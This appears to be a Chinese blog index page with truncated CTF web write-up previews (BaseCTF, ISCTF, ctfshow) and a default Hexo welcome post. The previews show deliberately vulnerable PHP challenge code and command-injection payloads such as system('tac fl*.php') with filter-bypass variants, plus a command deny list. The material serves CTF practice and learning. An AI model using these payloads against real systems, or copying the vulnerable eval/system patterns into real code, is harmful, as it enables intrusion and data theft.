basectf2024web部分wpA Dark Room:源码;
Aura 酱的礼物:<?php highlight_file(__FILE__); // Aura 酱,欢迎回家~ // 这里有一份礼物,请你签收一下哟~ $pen = $_POST['pen']; if (file_get_contents($pen) !== 'Aura') { die('这是 Aura 的礼物,你不是 Aura!'); } // 礼物收到啦,接下来要去博客里面写下感想哦~ $challenge = $_POST['challenge']; if (strpos($challenge, 'http://jasmineaura.github.io') !== 0) { die('这不是 Aura 的博客!'); } $blog_content = file_get_contents($challenge); if (strpos( ...
isctf2023web部分wp圣杯战争!!!:<?php highlight_file(__FILE__); error_reporting(0); class artifact{ public $excalibuer; public $arrow; public function __toString(){ echo "为Saber选择了对的武器!<br>"; return $this->excalibuer->arrow; } } class prepare{ public $release; public function __get($key){ $functioin = $this->release; echo "蓄力!咖喱棒!!<br>"; return $functioin(); } } class saber{ publi ...
PHP特性:89:if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); }
命令执行:?c=system(‘tac fl*’);
90:if(isset($_GET['num'])){ $num = $_GET['num']; if($num==="4476"){ die("no no no!"); } if(intval($num,0)===4476){ echo $flag; }else{ echo intval($num,0); }
intval: ...
ISCTF2024:1z_php:if(isset($_POST['J'])){ $call=$_POST['J']; $dangerous_commands = ['cat', 'tac', 'head', 'nl', 'more', 'less', 'tail', 'vi', 'sed', 'od']; foreach ($dangerous_commands as $command) { if (preg_match("/$command/i", $call)) { die("这些个危险函数可不兴使啊"); } } system($call);}?>
J=ls / J=un ...
emojictfwebRCE:发现f12不能使用,没事,张师傅给我说ctrl+shift+i就可以了,ok.试了试发现没有有用的东西,dirsearch扫描一下发现robots.txt
然后发现 /fl@g.php,查看:
<?phphighlight_file(__FILE__);error_reporting(0);if(isset($_GET['emo'])){ $emo = $_GET['emo']; if(!preg_match("/\;|\"|\*| |[b-h]|[m-r]|\\$|\{|\}|\^|\>/i",$emo)){ system($emo); } else{ echo "Again"; }}else{ echo "Try";}
先进行ls查看,发现flag.txt,然后emo=tail%09 ...
接下来开始我们的RCE刷题SHOW29:if(isset($_GET['c’]));if(!preg_match("/flag/i",$c)){eval($c);}else{highlight file( FILE );
先看代码分析出来这个是命令执行,让我们get传参c,然后过滤了flag和他的大小写
那么payload就出来了:c=system('tac fl*.php');(也可以使用其他的查看符)其他:c=system('tac fl""ag.php');c=system('tac fl``ag.php');c=system('ta\c fl\ag.php');等等
30:if(isset($_GET['c’])){8c = S GETL'c’]:if(!preg_match("/flag|system|php/i", $c)){eval($c):} ...
1.简述:在很多Web应用中,开发人员会使用一些特殊函数,这些函数以一些字符串作为输入,功能是将输入的字符串当作代码或者命令来进行执行。当用户可以控制这些函数的输入时,就产生了RCE漏洞。
危害:可以让用户(通常是系统管理员或普通用户)执行任意系统命令的漏洞。这种漏洞通常存在于某些程序或脚本中,允许输入参数被编码并传递给可执行文件。
比如:如果应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。而如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器。
2.分类:命令执行和代码执行3.常见函数:(1)命令执行函数:system():能将字符串作为OS命令执行,且返回命令执行结果;exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显);shell_exec():能将字 ...
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post$ hexo new "My New Post"
More info: Writing
Run server$ hexo server
More info: Server
Generate static files$ hexo generate
More info: Generating
Deploy to remote sites$ hexo deploy
More info: Deployment